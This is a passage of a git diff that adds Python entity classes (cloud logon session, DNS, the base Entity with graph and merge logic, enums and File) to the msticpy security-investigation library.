+        "StartTime": None,
+        "EndTime": None,
+    }
diff --git a/msticpy/datamodel/entities/cloud_logon_session.py b/msticpy/datamodel/entities/cloud_logon_session.py
new file mode 100644
index 000000000..1f86e7b55
--- /dev/null
+++ b/msticpy/datamodel/entities/cloud_logon_session.py
@@ -0,0 +1,98 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""CloudApplication Entity class."""
+from typing import Any, Mapping, Optional
+
+from ..._version import VERSION
+from ...common.utility import export
+from .entity import Entity
+
+__version__ = VERSION
+__author__ = "Pete Bryan"
+
+
+# pylint: disable=invalid-name
+
+
+@export
+class CloudLogonSession(Entity):
+    """
+    CloudLogonSession Entity class.
+
+    Attributes
+    ----------
+    SessionId : str
+        The loggon session ID
+    Account : str
+        The Account
+    UserAgent : str
+        The UserAgent
+    StartTime: str
+        The time the session started
+
+    """
+
+    ID_PROPERTIES = ["Name"]
+
+    def __init__(
+        self,
+        src_entity: Mapping[str, Any] = None,
+        src_event: Mapping[str, Any] = None,
+        **kwargs,
+    ):
+        """
+        Create a new instance of the entity type.
+
+        Parameters
+        ----------
+        src_entity : Mapping[str, Any], optional
+            Create entity from existing entity or
+            other mapping object that implements entity properties.
+            (the default is None)
+        src_event:  Mapping[str, Any], optional
+            Create entity from an event
+
+        Other Parameters
+        ----------------
+        kwargs : Dict[str, Any]
+            Supply the entity properties as a set of
+            kw arguments.
+
+        """
+        self.SessionId: Optional[str] = None
+        self.Account: Optional[str] = None
+        self.UserAgent: Optional[str] = None
+        self.StartTime: Optional[str] = None
+        super().__init__(src_entity=src_entity, **kwargs)
+        if src_event:
+            self._create_from_event(src_event)
+
+    def _create_from_event(self, src_event):
+        self.SessionId = src_event.get("SessionId")
+        self.Account = src_event.get("Account")
+        self.UserAgent = src_event.get("UserAgent")
+        self.StartTime = src_event.get("StartTimeUtc")
+
+    @property
+    def description_str(self) -> str:
+        """Return Entity Description."""
+        return self.Account or self.__class__.__name__
+
+    @property
+    def name_str(self) -> str:
+        """Return Entity Name."""
+        desc = f"{self.StartTime} - {self.Account} - {self.UserAgent}"
+        return desc or self.__class__.__name__
+
+    _entity_schema = {
+        # Name (type System.String)
+        "SessionId": None,
+        "Account": None,
+        "UserAgent": None,
+        "TimeGenerated": None,
+        "StartTime": None,
+        "EndTime": None,
+    }
diff --git a/msticpy/datamodel/entities/dns.py b/msticpy/datamodel/entities/dns.py
new file mode 100644
index 000000000..55a570cb4
--- /dev/null
+++ b/msticpy/datamodel/entities/dns.py
@@ -0,0 +1,90 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Dns Entity class."""
+from typing import Any, List, Mapping, Optional
+
+from ..._version import VERSION
+from ...common.utility import export
+from .entity import Entity
+from .ip_address import IpAddress
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+# pylint: disable=invalid-name
+
+
+@export
+class Dns(Entity):
+    """
+    DNS Resolve Entity class.
+
+    Attributes
+    ----------
+    DomainName : str
+        DnsResolve DomainName
+    IpAdresses : List[str]
+        DnsResolve IpAdresses
+    DnsServerIp : IPAddress
+        DnsResolve DnsServerIp
+    HostIpAddress : IPAddress
+        DnsResolve HostIpAddress
+
+    """
+
+    ID_PROPERTIES = ["DomainName"]
+
+    def __init__(self, src_entity: Mapping[str, Any] = None, **kwargs):
+        """
+        Create a new instance of the entity type.
+
+        Parameters
+        ----------
+        src_entity : Mapping[str, Any], optional
+            Create entity from existing entity or
+            other mapping object that implements entity properties.
+            (the default is None)
+
+        Other Parameters
+        ----------------
+        kwargs : Dict[str, Any]
+            Supply the entity properties as a set of
+            kw arguments.
+
+        """
+        self.DomainName: Optional[str] = None
+        self.IpAdresses: List[IpAddress] = []
+        self.DnsServerIp: Optional[IpAddress] = None
+        self.HostIpAddress: Optional[IpAddress] = None
+        super().__init__(src_entity=src_entity, **kwargs)
+
+    @property
+    def description_str(self) -> str:
+        """Return Entity Description."""
+        return f"{self.DomainName}: IPs: {repr(self.IpAdresses)}"
+
+    @property
+    def name_str(self) -> str:
+        """Return Entity Name."""
+        return self.DomainName or self.__class__.__name__
+
+    _entity_schema = {
+        # DomainName (type System.String)
+        "DomainName": None,
+        # IpAdresses (type System.Collections.Generic.List`1
+        # [Microsoft.Azure.Security.Detection.AlertContracts.V3.Entities.IP])
+        "IpAdresses": (List, "IpAddress"),
+        # DnsServerIp (type Microsoft.Azure.Security.Detection
+        # .AlertContracts.V3.Entities.IP)
+        "DnsServerIp": "IpAddress",
+        # HostIpAddress (type Microsoft.Azure.Security.Detection
+        # .AlertContracts.V3.Entities.IP)
+        "HostIpAddress": "IpAddress",
+        "TimeGenerated": None,
+        "StartTime": None,
+        "EndTime": None,
+    }
diff --git a/msticpy/datamodel/entities/entity.py b/msticpy/datamodel/entities/entity.py
new file mode 100644
index 000000000..ae4353dc1
--- /dev/null
+++ b/msticpy/datamodel/entities/entity.py
@@ -0,0 +1,706 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Entity Entity class."""
+import json
+import pprint
+import typing
+from datetime import datetime
+from abc import ABC
+from copy import deepcopy
+from typing import Any, Dict, List, Mapping, Optional, Type, Union
+
+import networkx as nx
+
+from ..._version import VERSION
+from ...common.utility import export, valid_pyname
+from .entity_enums import ENTITY_ENUMS
+from .entity_graph import Node
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+# pylint: disable=invalid-name, too-few-public-methods
+
+
+@export
+class ContextObject:
+    """Information object attached to entity but is not an Entity."""
+
+
+# pylint: enable=too-few-public-methods
+
+
+class _EntityJSONEncoder(json.JSONEncoder):
+    """Encode entity to JSON."""
+
+    def default(self, o):
+
+        if isinstance(o, Entity):
+            return {
+                name: value
+                for name, value in o.properties.items()
+                if value and name != "edges"
+            }
+        # Let the base class default method raise the TypeError
+        return json.JSONEncoder.default(self, o)
+
+
+# Future: replace setting entity properties in __dict__ with
+# setattr (to support attributes implemented as properties)
+@export
+class Entity(ABC, Node):
+    """
+    Entity abstract base class.
+
+    Implements common methods for Entity classes
+    """
+
+    ENTITY_NAME_MAP: Dict[str, type] = {}
+    _entity_schema: Dict[str, Any] = {}
+    ID_PROPERTIES: List[str] = []
+    JSONEncoder = _EntityJSONEncoder
+
+    def __init__(self, src_entity: Mapping[str, Any] = None, **kwargs):
+        """
+        Create a new instance of an entity.
+
+        Parameters
+        ----------
+        src_entity : Mapping[str, Any], optional
+            If src_entity is supplied it attempts to extract common
+            properties from the source entity and assign them to
+            the new instance. (the default is None)
+
+        Other Parameters
+        ----------------
+        kwargs : Dict[str, Any]
+            Supply the entity properties as a set of
+            kw arguments.
+
+        """
+        super().__init__()
+        self.TimeGenerated = datetime.utcnow()
+        self.Type = self._get_entity_type_name(type(self))
+        # If we have an unknown entity see if we a type passed in
+        if self.Type == "unknownentity" and "Type" in kwargs:
+            self.Type = kwargs["Type"]
+        # Make sure Type is in the class schema dictionary
+        self._entity_schema["Type"] = None
+
+        # if we didn't populate AdditionalData, add an empty dict in case it's
+        # needed
+        if "AdditionalData" not in self:
+            self.AdditionalData = {}
+
+        if src_entity is not None:
+            self._extract_src_entity(src_entity)
+            # add AdditionalData dictionary if it's populated
+            if "AdditionalData" in src_entity:
+                self.AdditionalData = src_entity["AdditionalData"]
+            if "TimeGenerated" in src_entity:
+                self.TimeGenerated = src_entity["TimeGenerated"]
+
+        if kwargs:
+            self.__dict__.update(kwargs)
+
+    @classmethod
+    def create(cls, src_entity: Mapping[str, Any] = None, **kwargs) -> "Entity":
+        """
+        Create an entity from a mapping type (e.g. pd.Series) or dict or kwargs.
+
+        Returns
+        -------
+        Entity
+            Instantiated entity
+
+        Notes
+        -----
+        The entity type should be specified as "Type", in either a key of `src_entity`
+        or as a keyword argument.
+
+        """
+        ent_type = (
+            src_entity.get("Type") or src_entity.get("type")
+            if src_entity
+            else kwargs.get("Type") or kwargs.get("type")
+        )
+        if not ent_type:
+            ent_type = "unknown"
+        ent_cls = cls.ENTITY_NAME_MAP.get(ent_type)
+        if not ent_cls:
+            ent_cls = cls.ENTITY_NAME_MAP["unknown"]
+        return ent_cls(src_entity, **kwargs)
+
+    def _extract_src_entity(self, src_entity: Mapping[str, Any]):
+        """
+        Extract source entity properties.
+
+        Parameters
+        ----------
+        src_entity : Mapping[str, Any]
+            The source mappable object from which to
+            extract entity properties.
+
+        """
+        schema_dict = self._entity_schema.copy()
+        schema_dict["Type"] = None
+        for attr, val in schema_dict.items():
+            if attr not in src_entity:
+                continue
+            self[attr] = src_entity[attr]
+
+            if val is None:
+                continue
+            try:
+                # If the property is an enum
+                if val in ENTITY_ENUMS.values():
+                    self[attr] = val[src_entity[attr]]
+                elif val in ENTITY_ENUMS:
+                    self[attr] = ENTITY_ENUMS[val][src_entity[attr]]
+                    continue
+            except KeyError:
+                # Catch key errors from invalid enum values
+                self[attr] = None
+
+            if isinstance(val, tuple):
+                self._instantiate_from_value(attr, val, src_entity)
+            else:
+                self._instantiate_from_entity(attr, val, src_entity)
+
+    def _instantiate_from_value(self, attr, val, src_entity):
+        # if the property is a collection
+        entity_type = None
+        if isinstance(val[1], (type)) and issubclass(val[1], Entity):
+            entity_type = val[1]
+        entity_list = [
+            Entity.instantiate_entity(col_entity, entity_type=entity_type)
+            for col_entity in src_entity[attr]
+        ]
+
+        self[attr] = entity_list
+        for child_entity in entity_list:
+            if isinstance(child_entity, Entity):
+                self.add_edge(child_entity, edge_attrs={"name": attr})
+
+    def _instantiate_from_entity(self, attr, val, src_entity):
+        # else try to instantiate an entity
+        entity_type = None
+        if isinstance(val, type) and issubclass(val, Entity):
+            entity_type = val
+        self[attr] = Entity.instantiate_entity(
+            src_entity[attr], entity_type=entity_type
+        )
+        if isinstance(self[attr], Entity):
+            self.add_edge(self[attr], edge_attrs={"name": attr})
+
+    def __getitem__(self, key: str):
+        """Allow property get using dictionary key syntax."""
+        if key in self.__dict__:
+            return self.__dict__[key]
+        if key in self._entity_schema:
+            return None
+        raise KeyError
+
+    def __setitem__(self, key: str, value: Any):
+        """Allow property set using dictionary key syntax."""
+        self.__dict__[key] = value
+
+    def __contains__(self, key: str):
+        """Allow property in test."""
+        # In operator overload
+        return key in self.__dict__
+
+    def __getattr__(self, name: str):
+        """Return the value of the named property 'name'."""
+        props = ["name_str", "description_str"]
+        if name in self._entity_schema or name in props:
+            return None
+        raise AttributeError(f"{name} is not a valid attribute.")
+
+    def __iter__(self):
+        """Iterate over entity_properties."""
+        return iter(self.properties)
+
+    def __len__(self) -> int:
+        """Return length/number of entity_properties."""
+        return len(self.properties)
+
+    def __str__(self) -> str:
+        """Return string representation of entity."""
+        return pprint.pformat(self._to_dict(), indent=2, width=100)
+
+    def __repr__(self) -> str:
+        """Return repr of entity."""
+        params = ", ".join(
+            f"{name}={val}" for name, val in self.properties.items() if val
+        )
+        if self.edges:
+            params = f"{params}, edges={'. '.join(str(edge) for edge in self.edges)}"
+
+        if len(params) > 80:
+            params = params[:80] + "..."
+        return f"{self.__class__.__name__}({params})"
+
+    def _to_dict(self) -> dict:
+        """Return as simple nested dictionary."""
+        # pylint: disable=protected-access
+        return {
+            prop: val._to_dict() if isinstance(val, Entity) else val
+            for prop, val in self.properties.items()
+            if val is not None
+        }
+        # pylint: enable=protected-access
+
+    def _repr_html_(self) -> str:
+        """
+        Display entity in IPython/Notebook.
+
+        Returns
+        -------
+        HTML
+            IPython HTML object
+
+        """
+        return self.to_html()
+
+    def to_html(self) -> str:
+        """
+        Return HTML representation of entity.
+
+        Returns
+        -------
+        str
+            HTML representation of entity
+
+        """
+        e_text = str(self)
+        e_type = self.Type
+        e_text = e_text.replace("\n", "<br>").replace(" ", "&nbsp;")
+        return f"<h3>{e_type}</h3>{e_text}"
+
+    def to_json(self):  # noqa: N802
+        """Return object as a JSON string."""
+        return json.dumps(self, cls=self.JSONEncoder)
+
+    def __eq__(self, other: Any) -> bool:
+        """
+        Return True if the entities have the same properties/values.
+
+        Parameters
+        ----------
+        other : Any
+            The entity (object) to compare
+
+        Returns
+        -------
+        bool
+            True if the two objects have the same property values
+
+        """
+        if self.__class__ != other.__class__ or not isinstance(other, Entity):
+            return False
+        return self.properties == other.properties
+
+    def __hash__(self) -> int:
+        """Return the hash of the entity based on non-empty property values."""
+        return hash(
+            " ".join(
+                f"{prop}:{val}" for prop, val in self.properties.items() if str(val)
+            )
+        )
+
+    def is_equivalent(self, other: Any) -> bool:
+        """
+        Return True if the entities are equivalent.
+
+        Parameters
+        ----------
+        other : Any
+            The entity to check
+
+        Returns
+        -------
+        bool
+            True if equivalent.
+
+        Notes
+        -----
+        This method checks that the compared entities do not have
+        any property values with conflicting values. E.g.
+        self.A == other.A
+        self.B == "xyz" and other.B == None
+        self.C == [] and other.C == [1, 2, 3]
+
+        """
+        if self == other:
+            return True
+        if not isinstance(other, Entity):
+            return False
+        return not any(
+            self.__dict__[prop] != other.__dict__[prop]
+            and self.__dict__[prop]
+            and other.__dict__[prop]
+            for prop in self.__dict__  # pylint: disable=consider-using-dict-items
+        )
+
+    def merge(self, other: Any) -> "Entity":
+        """
+        Merge with other entity to create new entity.
+
+        Returns
+        -------
+        Entity
+            Merged entity.
+
+        Raises
+        ------
+        AttributeError
+            If the entities cannot be merged.
+
+        """
+        if self == other:
+            return self
+        if not self.can_merge(other):
+            raise AttributeError("Entities cannot be merged.")
+        merged = deepcopy(self)
+        for prop, value in other.properties.items():
+            if not value:
+                continue
+            if not self.__dict__[prop]:
+                setattr(merged, prop, value)
+            # Future (ianhelle) - cannot merge ID field
+        if other.edges:
+            self.edges.update(other.edges)
+        return merged
+
+    def can_merge(self, other: Any) -> bool:
+        """
+        Return True if the entities can be merged.
+
+        Parameters
+        ----------
+        other : Any
+            The other entity (object) to check
+
+        Returns
+        -------
+        bool
+            True if other has no conflicting properties.
+
+        """
+        if self.__class__ != other.__class__ or not isinstance(other, Entity):
+            return False
+
+        other_id_props = {
+            prop: getattr(other, prop, None)
+            for prop in other.ID_PROPERTIES
+            if getattr(other, prop, None) is not None
+        }
+        self_id_props = {
+            prop: getattr(self, prop, None)
+            for prop in self.ID_PROPERTIES
+            if getattr(self, prop, None) is not None
+        }
+        # Return True if there is no overlap
+        overlap = self_id_props.keys() | other_id_props.keys()
+        if not overlap:
+            return True
+        return all(getattr(self, prop) == getattr(other, prop) for prop in overlap)
+
+    @property
+    def properties(self) -> dict:
+        """
+        Return dictionary properties of entity.
+
+        Returns
+        -------
+        dict
+            Entity properties.
+
+        """
+        return {
+            name: value
+            for name, value in self.__dict__.items()
+            if not name.startswith("_") and name != "edges" and value
+        }
+
+    @property
+    def description_str(self) -> str:
+        """
+        Return Entity Description.
+
+        Returns
+        -------
+        str
+            Entity description (optional). If not overridden
+            by the Entity instance type, it will return the
+            Type string.
+
+        """
+        return self.Type
+
+    @property
+    def name_str(self) -> str:
+        """
+        Return Name Description.
+
+        Returns
+        -------
+        str
+            Entity Name (optional). If not overridden
+            by the Entity instance type, it will return the
+            class name string.
+
+        """
+        return self.__class__.__name__
+
+    @classmethod
+    def instantiate_entity(
+        cls, raw_entity: Mapping[str, Any], entity_type: Optional[Type] = None
+    ) -> Union["Entity", Mapping[str, Any]]:
+        """
+        Class factory to return entity from raw dictionary representation.
+
+        Parameters
+        ----------
+        raw_entity : Mapping[str, Any]
+            A mapping object (e.g. dictionary or pandas Series)
+            that contains the properties of the entity.
+        entity_type : Optional[Type]
+            The entity type to create, by default None.
+
+        Returns
+        -------
+        Entity
+            The instantiated entity
+
+        """
+        if "Type" not in raw_entity and entity_type is None:
+            return raw_entity
+
+        entity_type_name = raw_entity.get("Type")
+
+        if not entity_type_name and entity_type:
+            entity_type_name = cls._get_entity_type_name(entity_type)
+
+        if entity_type:
+            return entity_type(raw_entity)
+        if entity_type_name and entity_type_name.lower() in cls.ENTITY_NAME_MAP:
+            return cls.ENTITY_NAME_MAP[entity_type_name.lower()](raw_entity)
+
+        raise TypeError(f"Could not find a suitable type for {entity_type}")
+
+    @classmethod
+    def _get_entity_type_name(cls, entity_type: Type) -> str:
+        """
+        Get V3 entity name for an entity.
+
+        Parameters
+        ----------
+        entity_type : Type
+            The Entity class
+
+        Returns
+        -------
+        str
+            The V3 serialized name.
+
+        """
+        try:
+            name = next(
+                iter(
+                    (
+                        key
+                        for key, val in cls.ENTITY_NAME_MAP.items()
+                        if val == entity_type
+                    )
+                )
+            )
+        except StopIteration:
+            name = None
+        return name or "unknown"
+
+    @property
+    def node_properties(self) -> Dict[str, Any]:
+        """
+        Return all public properties that are not entities.
+
+        Returns
+        -------
+        Dict[str, Any]
+            Dictionary of name, value properties.
+
+        """
+        props = {
+            name: str(value)
+            for name, value in self.properties.items()
+            if not isinstance(value, (Entity, list)) and name != "edges"
+        }
+        props["Description"] = self.description_str
+        props["Name"] = self.name_str
+        return props
+
+    def to_networkx(self, graph: nx.Graph = None) -> nx.Graph:
+        """
+        Return networkx graph of entities.
+
+        Parameters
+        ----------
+        graph : nx.Graph, optional
+            Graph to add entities to. If not supplied the function
+            creates and returns a new graph.
+            By default None
+
+        Returns
+        -------
+        nx.Graph
+            Graph with entity and any connected entities.
+
+        """
+        graph = graph or nx.Graph()
+        if not graph.has_node(self):
+            graph.add_node(self.name_str, **self.node_properties)
+        for edge in self.edges:
+            if not isinstance(edge.source, Entity) or not isinstance(
+                edge.target, Entity
+            ):
+                continue
+            if graph.has_edge(edge.source.name_str, edge.target.name_str):
+                continue
+            graph.add_edge(edge.source.name_str, edge.target.name_str, **edge.attrs)
+
+            for node in (edge.source, edge.target):
+                # If this node has edges that are not in our graph
+                # call to_networkx recursively on that node.
+                if any(
+                    edge
+                    for edge in node.edges
+                    if isinstance(edge.source, Entity)
+                    and isinstance(edge.target, Entity)
+                    and not graph.has_edge(edge.source.name_str, edge.target.name_str)
+                ):
+                    ent_node = typing.cast(Entity, node)
+                    ent_node.to_networkx(graph)
+        return graph
+
+    @classmethod
+    def get_pivot_list(cls) -> List[str]:
+        """
+        Return list of current pivot functions.
+
+        Returns
+        -------
+        List[str]
+            List of pivot functions assigned to entity.
+
+        """
+        pivots = []
+        for prop in dir(cls):
+            attr = getattr(cls, prop)
+            if hasattr(attr, "pivot_properties"):
+                pivots.append(prop)
+                continue
+            if attr.__class__.__name__ != "QueryContainer":
+                continue
+            for name, qt_attr in attr:
+                if hasattr(qt_attr, "pivot_properties"):
+                    pivots.append(f"{prop}.{name}")
+        return sorted(pivots)
+
+    # alias for get_pivot_list
+    pivots = get_pivot_list
+
+    def list_pivot_funcs(self):
+        """Print list of pivot functions assigned to entity."""
+        print("\n".join(self.get_pivot_list()))
+
+    @classmethod
+    def make_pivot_shortcut(cls, func_name: str, target: str, overwrite: bool = False):
+        """
+        Add a shortcut to a pivot function to the class.
+
+        Parameters
+        ----------
+        func_name : str
+            The name of source pivot function.
+        target : str
+            The shortcut name (this will be a member function of the class)
+        overwrite : bool, optional
+            Force overwrite an existing pivot function, by default False
+
+        Raises
+        ------
+        AttributeError
+            The source function does not exist
+        TypeError
+            The source function is not a pivot function.
+        TypeError
+            The target attribute exists and is not a pivot function
+        AttributeError
+            The target function exists and 'overwrite=True' was not specified.
+
+        """
+        func_path = func_name.split(".") if "." in func_name else [func_name]
+        curr_attr: Optional[Any] = cls
+        for path in func_path:
+            curr_attr = getattr(curr_attr, path, None)  # type: ignore
+            if not curr_attr:
+                raise AttributeError(f"No function found for {func_name}")
+        if not hasattr(curr_attr, "pivot_properties"):
+            raise TypeError(f"Function {func_name} is not a Pivot function")
+        tgt_name = valid_pyname(target)
+        if tgt_name != target:
+            print(f"{target} rename to valid Python identifier {tgt_name}")
+
+        existing_attr = getattr(cls, tgt_name, None)
+        if existing_attr:
+            if not hasattr(existing_attr, "pivot_properties"):
+                raise TypeError(
+                    f"Cannot overwrite existing an attribute {tgt_name}.",
+                    "This is not a pivot function.",
+                )
+            if not overwrite:
+                raise AttributeError(
+                    f"{cls.__name__} already has an attribute {tgt_name}",
+                    "Use 'overwrite' parameter to force.",
+                )
+        setattr(cls, tgt_name, curr_attr)
+
+    @classmethod
+    def del_pivot_shortcut(cls, func_name: str):
+        """
+        Remove a pivot shortcut.
+
+        Parameters
+        ----------
+        func_name : str
+            The name of the shortcut function.
+
+        Raises
+        ------
+        AttributeError
+            The class does not have an attribute `func_name`
+        TypeError
+            The attribute to delete is not a pivot shortcut.
+
+        """
+        existing_attr = getattr(cls, func_name, None)
+        if not existing_attr:
+            raise AttributeError(
+                f"{cls.__name__} has no attribute {func_name}",
+            )
+        if not hasattr(existing_attr, "pivot_properties"):
+            raise TypeError(
+                f"Cannot delete an attribute {func_name} that isn't a pivot function.",
+                "This is not a pivot function.",
+            )
+        delattr(cls, func_name)
+
+
+def camelcase_property_names(input_ent: Dict[str, Any]) -> Dict[str, Any]:
+    """Change initial letter Microsoft Sentinel API entity properties to upper case."""
+    return {key[0].upper() + key[1:]: input_ent[key] for key in input_ent}
diff --git a/msticpy/datamodel/entities/entity_enums.py b/msticpy/datamodel/entities/entity_enums.py
new file mode 100644
index 000000000..36c3baa30
--- /dev/null
+++ b/msticpy/datamodel/entities/entity_enums.py
@@ -0,0 +1,87 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Entity enumerations."""
+from enum import Enum
+from typing import Dict, Type
+
+from ..._version import VERSION
+from ...common.utility import export
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+ENTITY_ENUMS: Dict[str, Type] = {}
+
+
+# pylint: disable=invalid-name
+@export
+class Algorithm(Enum):
+    """FileHash Algorithm Enumeration."""
+
+    Unknown = 0
+    MD5 = 1
+    SHA1 = 2
+    SHA256 = 3
+    SHA256AC = 4
+
+
+@export
+class ElevationToken(Enum):
+    """ElevationToken enumeration."""
+
+    Default = 0
+    Full = 1
+    Limited = 2
+
+
+@export
+class OSFamily(Enum):
+    """OSFamily enumeration."""
+
+    Linux = 0
+    Windows = 1
+
+
+@export
+class RegistryHive(Enum):
+    """RegistryHive enumeration."""
+
+    # <summary>HKEY_LOCAL_MACHINE</summary>
+    HKEY_LOCAL_MACHINE = 0
+    # <summary>HKEY_CLASSES_ROOT</summary>
+    HKEY_CLASSES_ROOT = 1
+    # <summary>HKEY_CURRENT_CONFIG</summary>
+    HKEY_CURRENT_CONFIG = 2
+    # <summary>HKEY_USERS</summary>
+    HKEY_USERS = 3
+    # <summary>HKEY_CURRENT_USER_LOCAL_SETTINGS</summary>
+    HKEY_CURRENT_USER_LOCAL_SETTINGS = 4
+    # <summary>HKEY_PERFORMANCE_DATA</summary>
+    HKEY_PERFORMANCE_DATA = 5
+    # <summary>HKEY_PERFORMANCE_NLSTEXT</summary>
+    HKEY_PERFORMANCE_NLSTEXT = 6
+    # <summary>HKEY_PERFORMANCE_TEXT</summary>
+    HKEY_PERFORMANCE_TEXT = 7
+    # <summary>HKEY_A</summary>
+    HKEY_A = 8
+    # <summary>HKEY_CURRENT_USER</summary>
+    HKEY_CURRENT_USER = 9
+
+    @property
+    def short_name(self) -> str:
+        """Return the key shortname."""
+        # pylint: disable=no-member
+        return f"HK{''.join([n[0] for n in self.name.split('_')[1:]])}"
+        # pylint: enable=no-member
+
+
+ENTITY_ENUMS = {
+    Algorithm.__name__: Algorithm,
+    ElevationToken.__name__: ElevationToken,
+    OSFamily.__name__: OSFamily,
+    RegistryHive.__name__: RegistryHive,
+}
diff --git a/msticpy/datamodel/entities/entity_graph.py b/msticpy/datamodel/entities/entity_graph.py
new file mode 100644
index 000000000..bec933146
--- /dev/null
+++ b/msticpy/datamodel/entities/entity_graph.py
@@ -0,0 +1,82 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Entity Graph classes."""
+from typing import Any, Dict, Set, Optional
+
+from ..._version import VERSION
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+class Node:
+    """Entity node."""
+
+    def __init__(self):
+        """Initialize the node."""
+        self.edges: Set["Edge"] = set()
+
+    def add_edge(self, target: "Node", edge_attrs: Optional[Dict[str, Any]] = None):
+        """
+        Add an edge between self and target.
+
+        Parameters
+        ----------
+        target : Node
+            Target node.
+        edge_attrs : Optional[Dict[str, Any]], optional
+            Attributes to assign to new edge, by default None
+
+        """
+        edge = Edge(self, target, edge_attrs) if edge_attrs else Edge(self, target)
+        if not self.has_edge(target):
+            self.edges.add(edge)
+        if not target.has_edge(self):
+            target.edges.add(edge)
+
+    def has_edge(self, other):
+        """Return True if node has an edge with `other`."""
+        return any(edge for edge in self.edges if other in (edge.target, edge.source))
+
+
+class Edge:
+    """Entity edge class."""
+
+    def __init__(self, source: Node, target: Node, attrs: Dict[str, Any] = None):
+        """
+        Create a new edge between `source` and `target`.
+
+        Parameters
+        ----------
+        source : Node
+            Source node.
+        target : Node
+            Target node.
+        attrs : Dict[str, Any], optional
+            Dictionary of name/value edge attributes, by default None
+
+        """
+        self.source: Node = source
+        self.target: Node = target
+
+        self.attrs: Dict[str, Any] = attrs or {}
+
+    def add_attr(self, name: str, value: Any):
+        """Add an edge attribute."""
+        self.attrs[name] = value
+
+    def __str__(self):
+        """Return string representation of edge."""
+        return self.attrs.get("name", "unnamed-edge")
+
+    def __repr__(self):
+        """Return full repr of edge."""
+        other_attrs = [
+            f"{name}='{val}'" for name, val in self.attrs.items() if name != "name"
+        ]
+        if not other_attrs:
+            return f"Edge(name={str(self)})"
+        return f"Edge(name={str(self)}, {', '.join(other_attrs)})"
diff --git a/msticpy/datamodel/entities/file.py b/msticpy/datamodel/entities/file.py
new file mode 100644
index 000000000..1b327e40d
--- /dev/null
+++ b/msticpy/datamodel/entities/file.py
@@ -0,0 +1,202 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""File Entity class."""
+from typing import Any, List, Mapping, Optional
+
+from ..._version import VERSION
+from ...common.utility import export
+from .entity import Entity
+from .entity_enums import Algorithm, OSFamily
+from .file_hash import FileHash
+from .host import Host
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+# pylint: disable=invalid-name, too-many-instance-attributes
+
+
+@export
+class File(Entity):
+    """
+    File Entity class.
+
+    Attributes
+    ----------
+    FullPath : str
+        File FullPath
+    Directory : str
+        File Directory
+    Name : str
+        File Name
+    Md5 : str
+        File Md5
+    Host : str
+        File Host
+    Sha1 : str
+        File Sha1
+    Sha256 : str
+        File Sha256
+    Sha256Ac : str
+        File Sha256Ac
+    FileHashes : List[FileHash]
+        File FileHashes
+
+    """
+
+    ID_PROPERTIES = ["FullPath", "Sha1", "Sha256", "Sha256ac", "Md5"]
+
+    def __init__(
+        self,
+        src_entity: Mapping[str, Any] = None,
+        src_event: Mapping[str, Any] = None,
+        role: str = "new",
+        **kwargs,
+    ):
+        """
+        Create a new instance of the entity type.
+
+        Parameters
+        ----------
+        src_entity : Mapping[str, Any], optional
+            Create entity from existing entity or
+            other mapping object that implements entity properties.
+            (the default is None)
+        src_event : Mapping[str, Any], optional
+            Create entity from event properties
+            (the default is None)
+        role : str, optional
+            'new' or 'parent' - only relevant if the entity
+            is being constructed from an event.
+            (the default is 'new')
+
+        Other Parameters
+        ----------------
+        kwargs : Dict[str, Any]
+            Supply the entity properties as a set of
+            kw arguments.
+
+        """
+        self.FullPath: Optional[str] = None
+        self.Directory: Optional[str] = None
+        self.Name: Optional[str] = None
+        self.Md5: Optional[str] = None
+        self.Host: Optional[Host] = None
+        self.Sha1: Optional[str] = None
+        self.Sha256: Optional[str] = None
+        self.Sha256Ac: Optional[str] = None
+        self.FileHashes: List[FileHash] = []
+        self.PathSeparator: Optional[str] = "\\"
+        self.OSFamily = OSFamily.Windows
+        super().__init__(src_entity=src_entity, **kwargs)
+        if src_event is not None:
+            self._create_from_event(src_event, role)
+
+        if not self.FullPath:
+            file_name = self.Name
+            directory = self.Directory or ""
+            sep = self.path_separator if directory else ""
+            self.FullPath = f"{directory}{sep}{file_name}"
+
+    @property
+    def path_separator(self):
+        """Return the path separator used by the file."""
+        if (
+            self.Directory and "/" in self.Directory
+        ) or self.OSFamily != OSFamily.Windows:
+            return "/"
+        return "\\"
+
+    @property
+    def description_str(self) -> str:
+        """Return Entity Description."""
+        return self.FullPath or self.__class__.__name__
+
+    @property
+    def name_str(self) -> str:
+        """Return Entity Name."""
+        return self.Name or self.FullPath or self.__class__.__name__
+
+    def _create_from_event(self, src_event, role):
+        if role == "new" and "NewProcessName" in src_event:
+            self._add_paths(src_event["NewProcessName"])
+        elif role == "parent" and "ParentProcessName" in src_event:
+            self._add_paths(src_event["ParentProcessName"])
+        elif "Directory" in src_event and "FileName" in src_event:
+            self._add_paths(src_event["Directory"], file_name=src_event["FileName"])
+
+    _entity_schema = {
+        # FullPath (type System.String)
+        "FullPath": None,
+        # Directory (type System.String)
+        "Directory": None,
+        # Name (type System.String)
+        "Name": None,
+        # Md5 (type System.String)
+        "Md5": None,
+        # Host (type Microsoft.Azure.Security.Detection
+        # .AlertContracts.V3.Entities.Host)
+        "Host": "Host",
+        # Sha1 (type System.String)
+        "Sha1": None,
+        # Sha256 (type System.String)
+        "Sha256": None,
